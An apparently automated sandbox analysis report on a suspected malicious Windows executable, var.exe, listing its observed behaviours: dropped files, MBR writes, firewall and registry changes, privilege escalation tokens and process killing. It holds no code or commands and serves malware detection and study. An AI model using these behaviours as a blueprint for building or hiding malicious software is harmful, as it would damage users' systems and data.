Analysis Overview
SHA256
a12cb2d529a95798160114bdb6fb389553d3cc1d8bd10a5c8295d5a0c74e257c
Threat Level: Likely malicious
The file var.exe was found to be: Likely malicious.
Malicious Activity Summary
Creates new service(s)
Modifies Windows Firewall
Loads dropped DLL
Executes dropped EXE
Reads user/profile data of web browsers
Writes to the Master Boot Record (MBR)
Enumerates connected drives
Drops file in System32 directory
Suspicious use of NtSetInformationThreadHideFromDebugger
Drops file in Program Files directory
Launches sc.exe
Drops file in Windows directory
Enumerates physical storage devices
Program crash
Unsigned PE
Uses Task Scheduler COM API
Checks processor information in registry
Modifies data under HKEY_USERS
Suspicious use of WriteProcessMemory
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: EnumeratesProcesses
Kills process with taskkill
Checks SCSI registry key(s)
Uses Volume Shadow Copy service COM API
Suspicious use of FindShellTrayWindow
Suspicious use of SetWindowsHookEx
MITRE ATT&CK Matrix V13
Analysis: static1
Detonation Overview
Reported
2024-06-14 17:41
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-14 17:41
Reported
2024-06-14 17:44
Platform
win7-20240508-en
Max time kernel
146s
Max time network
149s
Command Line
Signatures
Creates new service(s)
Modifies Windows Firewall
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
Executes dropped EXE
Loads dropped DLL
Reads user/profile data of web browsers
Enumerates connected drives
| Description | Indicator | Process | Target |
|---|---|---|---|
| File opened (read-only) | \??\B: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\G: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\A: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\Y: | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| File opened (read-only) | \??\O: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\W: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\A: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\H: | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| File opened (read-only) | \??\E: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\L: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\N: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\Q: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\X: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\Q: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Y: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\X: | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| File opened (read-only) | \??\Q: | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| File opened (read-only) | \??\U: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\Y: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\N: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\K: | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| File opened (read-only) | \??\R: | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| File opened (read-only) | \??\I: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\K: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\E: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\O: | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| File opened (read-only) | \??\P: | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| File opened (read-only) | \??\V: | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| File opened (read-only) | \??\Z: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\J: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\A: | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| File opened (read-only) | \??\S: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\P: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\R: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\T: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\L: | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| File opened (read-only) | \??\J: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\M: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\U: | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| File opened (read-only) | \??\S: | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| File opened (read-only) | \??\O: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\P: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\N: | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| File opened (read-only) | \??\W: | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| File opened (read-only) | \??\G: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\U: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\G: | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| File opened (read-only) | \??\R: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\E: | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| File opened (read-only) | \??\I: | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| File opened (read-only) | \??\M: | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| File opened (read-only) | \??\T: | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| File opened (read-only) | \??\Z: | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| File opened (read-only) | \??\L: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\B: | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| File opened (read-only) | \??\T: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\M: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\W: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\S: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\H: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\V: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\X: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\J: | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| File opened (read-only) | \??\H: | C:\Windows\SysWOW64\msiexec.exe | N/A |
Writes to the Master Boot Record (MBR)
| Description | Indicator | Process | Target |
|---|---|---|---|
| File opened for modification | \??\PhysicalDrive0 | C:\Program Files (x86)\WeGame\WeGame.exe | N/A |
| File opened for modification | \??\PhysicalDrive0 | C:\Program Files (x86)\WeGame\WeGame.exe | N/A |
| File opened for modification | \??\PhysicalDrive0 | C:\Program Files (x86)\WeGame\WeGame.exe | N/A |
| File opened for modification | \??\PhysicalDrive0 | C:\Program Files (x86)\WeGame\WeGame.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
|---|---|---|---|
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\Tencent\DeskUpdate\GlobalMgr.db | C:\Program Files (x86)\WeGame\WeGame.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\Tencent\WeGame\Flag | C:\Program Files (x86)\WeGame\WeGame.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\Tencent\DeskUpdate\GlobalMgr.db | C:\Program Files (x86)\WeGame\WeGame.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\Tencent\WeGame\Flag | C:\Program Files (x86)\WeGame\WeGame.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\Tencent\DeskUpdate\GlobalMgr.db | C:\Program Files (x86)\WeGame\WeGame.exe | N/A |
| File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\Tencent\DeskUpdate\GlobalMgr.db | C:\Program Files (x86)\WeGame\WeGame.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\Tencent\WeGame\Flag | C:\Program Files (x86)\WeGame\WeGame.exe | N/A |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\Tencent\WeGame\Flag | C:\Program Files (x86)\WeGame\WeGame.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\Tencent\DeskUpdate\GlobalMgr.db | C:\Program Files (x86)\WeGame\WeGame.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
Drops file in Program Files directory
| Description | Indicator | Process | Target |
|---|---|---|---|
| File created | C:\Program Files (x86)\WeGame\WeGame.exe | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Program Files (x86)\WeGame\log\wegame.mem.log | C:\Program Files (x86)\WeGame\WeGame.exe | N/A |
| File created | C:\Program Files (x86)\WeGame\log\wegame.20240614-174409-362.log | C:\Program Files (x86)\WeGame\WeGame.exe | N/A |
| File created | C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\1 | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Program Files (x86)\WeGame\log\wegame.mem.log | C:\Program Files (x86)\WeGame\WeGame.exe | N/A |
| File created | C:\Program Files (x86)\WeGame\beacon_sdk.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\WeGame\common.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\msvcp100.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\msvcr100.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\WeGame\adapt_for_imports.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\WeGame\Lua51.dll | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Program Files (x86)\WeGame\log\wegame.mem.log | C:\Program Files (x86)\WeGame\WeGame.exe | N/A |
| File created | C:\Program Files (x86)\WeGame\log\wegame.20240614-174239-194.log | C:\Program Files (x86)\WeGame\WeGame.exe | N/A |
| File created | C:\Program Files (x86)\WeGame\log\wegame.20240614-174309-208.log | C:\Program Files (x86)\WeGame\WeGame.exe | N/A |
| File opened for modification | C:\Program Files (x86)\WeGame\log\wegame.mem.log | C:\Program Files (x86)\WeGame\WeGame.exe | N/A |
| File created | C:\Program Files (x86)\WeGame\log\wegame.20240614-174339-316.log | C:\Program Files (x86)\WeGame\WeGame.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
|---|---|---|---|
| File opened for modification | C:\Windows\Installer\MSI394D.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI398D.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\INF\setupapi.ev3 | C:\Windows\system32\DrvInst.exe | N/A |
| File created | C:\Windows\Installer\f763553.msi | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\f763556.ipi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI37D3.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI3833.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\f763553.msi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\INF\setupapi.ev1 | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI35D0.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\ | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI37E4.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\f763556.ipi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\INF\setupapi.dev.log | C:\Windows\system32\DrvInst.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe |
Checks processor information in registry
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files (x86)\WeGame\WeGame.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files (x86)\WeGame\WeGame.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files (x86)\WeGame\WeGame.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files (x86)\WeGame\WeGame.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files (x86)\WeGame\WeGame.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files (x86)\WeGame\WeGame.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files (x86)\WeGame\WeGame.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files (x86)\WeGame\WeGame.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files (x86)\WeGame\WeGame.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files (x86)\WeGame\WeGame.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files (x86)\WeGame\WeGame.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files (x86)\WeGame\WeGame.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
|---|---|---|---|
| Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 | C:\Windows\system32\netsh.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SYSTEM\CurrentControlSet\Control\NetTrace | C:\Windows\system32\netsh.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 | C:\Windows\system32\netsh.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SYSTEM\CurrentControlSet\Control\NetTrace\Session | C:\Windows\system32\netsh.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\system32\cscript.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host | C:\Windows\system32\cscript.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-100 = "RD Gateway Quarantine Enforcement Client" | C:\Windows\system32\netsh.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-101 = "Provides RD Gateway enforcement for NAP" | C:\Windows\system32\netsh.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 | C:\Windows\system32\netsh.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SYSTEM\CurrentControlSet\Control\NetTrace | C:\Windows\system32\netsh.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-103 = "Microsoft Corporation" | C:\Windows\system32\netsh.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\system32\cscript.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 80bb632a82beda01 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-102 = "Microsoft Corporation" | C:\Windows\system32\netsh.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SYSTEM\CurrentControlSet\Control\NetTrace\Session | C:\Windows\system32\netsh.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SYSTEM\CurrentControlSet\Control\NetTrace\Session | C:\Windows\system32\netsh.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host\Settings | C:\Windows\system32\cscript.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-3 = "Microsoft Corporation" | C:\Windows\system32\netsh.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SYSTEM\CurrentControlSet\Control\NetTrace\Session | C:\Windows\system32\netsh.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 | C:\Windows\system32\netsh.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SYSTEM\CurrentControlSet\Control\NetTrace | C:\Windows\system32\netsh.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\system32\DrvInst.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-2 = "Provides IPsec based enforcement for Network Access Protection" | C:\Windows\system32\netsh.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft | C:\Windows\system32\cscript.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-101 = "Provides DHCP based enforcement for NAP" | C:\Windows\system32\netsh.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SYSTEM\CurrentControlSet\Control\NetTrace | C:\Windows\system32\netsh.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SYSTEM\CurrentControlSet\Control\NetTrace\Session | C:\Windows\system32\netsh.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software | C:\Windows\system32\cscript.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-1 = "IPsec Relying Party" | C:\Windows\system32\netsh.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-100 = "EAP Quarantine Enforcement Client" | C:\Windows\system32\netsh.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
|---|---|---|---|
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeCreateTokenPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| Token: SeMachineAccountPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| Token: SeTcbPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| Token: SeCreatePermanentPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
